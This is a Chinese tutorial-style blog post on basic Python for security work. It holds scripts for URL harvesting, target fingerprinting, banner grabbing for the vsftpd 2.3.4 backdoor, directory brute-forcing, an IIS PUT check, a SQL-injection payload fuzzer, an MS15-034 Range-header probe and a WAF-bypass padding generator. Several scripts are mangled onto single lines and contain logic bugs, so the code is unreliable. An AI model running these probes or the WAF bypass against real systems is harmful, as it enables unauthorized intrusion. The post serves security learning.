python安全编程基础内容
生活随笔
收集整理的這篇文章主要介紹了
python安全编程基础内容
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 基礎語法部分
- socket
- if語句
- for循環
- 函數
- 異常處理
- 線程
- argparse基本用法
- 獲取banner(服務名稱和版本)信息
- 編寫poc和exp
- 正則表達,網絡編程,套接字
- 模塊部分
- 模塊的概念
- 模塊導入
- python腳本基礎結構
- sys模塊
- 文件操作
- os模塊
- 基礎階段腳本
- 百度url收集腳本
- 四大件收集腳本
- 多線程獲取banner信息
- 目錄掃描工具
- PUT寫入
- 獲取服務器版本和腳本類型
- sql爆錯注入poc
- ms15_04 poc
- 萬能繞waf腳本(只能部分)
基礎語法部分
本文很水,只是隨心記錄,不喜勿噴,大佬繞過
socket
所謂套接字(Socket),就是對網絡中不同主機上的應用進程之間進行雙向通信的端點的抽象。一個套接字就是網絡上進程通信的一端,提供了應用層進程利用網絡協議交換數據的機制。從所處的地位來講,套接字上聯應用進程,下聯網絡協議棧,是應用程序通過網絡協議進行通信的接口,是應用程序與網絡協議根進行交互的接口
if語句
for循環
函數
異常處理
異常處理—傳送門
線程
argparse基本用法
用于傳遞用戶輸入的參數
argparse基本用法----傳送門
獲取banner(服務名稱和版本)信息
工具獲取banner信息
python獲取banner信息
代碼改進1—添加if語句判斷2.3.4是否在banner信息中
可見if目錄
代碼改進2–添加try
代碼改進3–創建函數并調用
可見函數目錄
編寫poc和exp
編寫poc和exp----傳送門
正則表達,網絡編程,套接字
傳送門
模塊部分
模塊的概念
模塊導入
python腳本基礎結構
sys模塊
文件操作
傳送門—文件操作
os模塊
基礎階段腳本
百度url收集腳本
#coding:utf-8 #!/usr/bin/env python # code by aedoo # github: https://github.com/aedoo/import requests,Queue,sys,threading,time from bs4 import BeautifulSoup import reclass BaiDuUrlSpider(threading.Thread):def __init__(self,queue):threading.Thread.__init__(self)self.__queue = queuedef run(self):while not self.__queue.empty():page_url = self.__queue.get(timeout=0.5)try:self.spider(page_url)except Exception,e:passdef spider(self,page_url):f1 = open('original_url.txt','a+')f2 = open('home_url.txt','a+')r = requests.get(url=page_url, headers=head)soup = BeautifulSoup(r.content,'lxml')raw_url = soup.find_all(name='a',attrs={'data-click':re.compile('.'),'class':None})for raw in raw_url:# print raw['href']trick_url = raw['href']response = requests.get(url=trick_url,headers=head,timeout=3)if response.status_code==200:print response.urloriginal_url = response.urlf1.write(original_url+'\n')url_tmp = response.urlurl_list = url_tmp.split('/')print url_list[0]+'//'+url_list[2]home_url = url_list[0]+'//'+url_list[2]f2.write(home_url+'\n')else:print response.status_codef1.close()f2.close()def main():global headhead = {'Connection': 'close','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Encoding': 'gzip, deflate, sdch, br','Accept-Language': 'zh-CN,zh;q=0.8', }queue = Queue.Queue()threads = []threads_count = 200 #設置線程數目,最好不要大于爬取的頁碼數if len(sys.argv)!=2:print 'python Usage: %s keyword'% sys.argv[0]sys.exit(-1)else:keyword = sys.argv[1]for i in range(0,750,10): #百度默認最多75頁,每頁10個,根據規則定義的url_start = 'https://www.baidu.com/s?wd=' + keyword + '&rn=10&pn=' #拼接百度搜索的URLurl = url_start+str(i)queue.put(url)for i in range(threads_count):threads.append(BaiDuUrlSpider(queue))for i in threads:i.start()for i in threads:i.join()if __name__ == '__main__':f1 = open('original_url.txt','w')f1.close()f2 = open('home_url.txt','w')f2.close()time_start = time.time()main()print time.time()-time_start四大件收集腳本
import requests import os import socket import time import optparse from bs4 import BeautifulSoup def main():usage='-x 判斷系統類型' \'-t 判斷數據庫類型' \'-g 判斷服務架構' \'-j 判斷網站語言'parser=optparse.OptionParser(usage)parser.add_option('-x',dest='system',help='判斷系統,判斷原理通過目錄來判斷例:https://www.btime.com/finance')parser.add_option('-t',dest='database',help='判斷數據庫,通過端口來判斷數據庫類型')parser.add_option('-g',dest='headerss',help='判斷架構')parser.add_option('-j',dest='language',help='判斷語言')(options,args)=parser.parse_args()if options.system:system=options.systemSYSTEM(system)elif options.database:database=options.databaseDATABASE(database)elif options.language:language=options.languageLANGUAGE(language)elif options.headerss:headerss=options.headerssHEADERSS(headerss)else:parser.print_help()exit() def SYSTEM(system):sc = "{}".format(system)gs = sc[-1].capitalize()sw = sc.strip(sc[-1])url = sw + gssg = requests.get(url)print(sg.url)a = requests.get(sc).contentb = requests.get(url).contentif a != b:print('系統是:Linux')else:print('系統是:windows') def DATABASE(database):s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:s.settimeout(3)s.connect((database,1433))print('[+]MSSQL數據庫開放')except:print('[-]1433關閉')time.sleep(0.1)try:s.settimeout(3)s.connect((database,1521))print('[+]oracle數據庫開放')except:print('[-]1521端口關閉')time.sleep(0.1)try:s.settimeout(3)s.connect((database,3306))print('[+]MYSQL數據庫開放')except:print('[-]3306關閉') def HEADERSS(headerss):url="{}".format(headerss)headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}r=requests.get(url,headers=headers)print('[+]協議類型:',url[0],url[1],url[2],url[3],'/',r.status_code)print('[+]服務架構:',r.headers['Server'])print('[+]頁面類型',r.headers['Content-Type']) def LANGUAGE(language):url="{}".format(language)headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}g=requests.get(url,headers=headers)try:print('[+]程序支持',g.headers['X-Powered-By'])except:print('[-]沒有找出該網站的程序支持') if __name__ == '__main__':main()多線程獲取banner信息
mport socket import argparse import threading import sys import osparse = argparse.ArgumentParser(description="You can try : python banner.py -r ip.txt -p 21") parse.add_argument('-r', '--dic', dest='diction', help='Please enter your dictionary', type=str) parse.add_argument('-p', '--port', dest='port', help='Please enter your port', type=int)args = parse.parse_args()ip_dir = args.diction port = args.port #獲取banner信息函數 def getBanner(ip,port):#1.設置超時時間socket.setdefaulttimeout(2)#2.打開套接字調用socket模塊try:s = socket.socket()#3.建立連接s.connect(ip.port)#4.接受數據banner = s.recv(1024)#5.關閉連接s.close()return bannerexcept:pass#漏洞檢查函數 def checkVulns(ip,port):#將兩個函數合并到一起,方便同時使用多線程banner = getBanner(ip,port)if banner:if("2.3.4" in banner):print('vulnerable')else:print('unvulnerable')else:print(ip +' '+ 'not get banner')#主函數 def main():# filename = str(sys.argv[1])# if not os.path.exists(filename):# print('文件不存在')# sys.exit()try:with open(ip_dir,'r') as f: #第一步:獲取用戶輸入的ip字典內容for ip in f.readlines():ip= ip.strip()#導入多線程t=threading.Thread(target=checkVulns,args=(ip,port))#開始多線程t.start()except Exception as f:print('你的錯誤是:%s'%f) ''#for i in range(1,51):#ip = print('192.168.1.'+str(i))#banner=getBanner(all_ip,port) #第二步:調用套接字函數調用套接字函數,看能否連接上該端口#如果banner1有值#則將他打印ip并且丟到漏洞函數去檢測#if banner: #第三步:如果有值,打印出ip,并吧對象丟進漏洞檢測函數去檢查#print(all_ip)#checkVulns(banner)#else:#pass'' if __name__ == '__main__':main()目錄掃描工具
mport argparse import requests import sysdef main():parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")parse.add_argument('-u', '--uesr', dest='name', help='Please enter your url', type=str)parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)args = parse.parse_args()url = args.namediction = args.diction# 準備url和遍歷字典 # url = "http://192.168.1.103:90"try:with open(diction, "r") as f:for line in f.readlines():line = line.strip()# print(url+line)# 讓url加遍歷的字典,如果遍歷的的url中返回200就代表找到了目錄,并打印出r = requests.get(url + line)if r.status_code == 200:print("find it:" + r.url)except Exception as e:print(str(e))if __name__ == '__main__':main()PUT寫入
import requestsurl='http://192.168.1.103' # 請求方式 r = requests.options(url) #print(r.headers['Allow']) result = r.headers['Public']if result.find("PUT") and result.find("MOVE"):print(result)print('exist iis put vuln') else:print('no find')獲取服務器版本和腳本類型
import requestsa=input('請寫入ip或域名:') url = a r = requests.get(url) print('中間件:'+ r.headers['Server']) print('服務器語言:'+ r.headers['X-Powered-By'])sql爆錯注入poc
import argparse import requests import sys import mathparse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt") parse.add_argument('-u', '--uesr', dest='url', help='Please enter your url', type=str) parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)args = parse.parse_args() url = args.url sql_fuzz_dic = args.dictiondef get_urls():urls = [] #1.打開字典with open(sql_fuzz_dic,'r') as f:payload_list = f.readlines() #2.遍歷字典并去除字符竄/nfor payload in payload_list:#申請零時變量temp_url = urlpayload = payload.strip()#3.替換url中fuzz為自己字典中的內容,并添加到temp_url變量中urls.append(temp_url.replace("FUZZ",payload))return urls#遍歷字典中的內容 inject_urls = get_urls() #for i in inject_urls:#print(i)result_list = [] #儲存驗證sql注入成功的url def text_sql():for i in inject_urls: #1.循環測試urlr =requests.get(url=i) #2.用r來接受get請求print('testing url:')print(r.url) #輸出測試的urlif r.text.find("SQL syntax"): #3.如果在請求中發現了sql syntaxresult_list.append(r.url) #4.將其添加到列表中if result_list == 0: #5.如果列表為空,則代表沒有注入,有值則有注入print('no sql') else:print('find it')for i in result_list: #6.遍歷列表中存在注入的內容print(i)ms15_04 poc
import requests a= input('請輸入MS_15_034 IP或域名:') url=aheader={'Host': 'stuff','Range': 'bytes=0-18446744073709551615' }r = requests.get(url,headers=header)server = r.headers['Server'] if server.find('IIS/7.5') or server.find('IIS/8.0'):if r.text.find('Requested Range Not Satisfiable'):print('find ms15_035')else:passelse:print('no find')萬能繞waf腳本(只能部分)
#coding=utf-8 import random,string from urllib import parse # code by yzddMr6 varname_min = 5 varname_max = 15 data_min = 20 data_max = 25 num_min = 50 num_max = 100 def randstr(length):str_list = [random.choice(string.ascii_letters) for i in range(length)]random_str = ''.join(str_list)return random_strdef main():data={}for i in range(num_min,num_max):data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))print('&'+parse.urlencode(data)+'&')main()總結
以上是生活随笔為你收集整理的python安全编程基础内容的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 使用Pocsuite3
- 下一篇: 计算机网络基础(缩短版)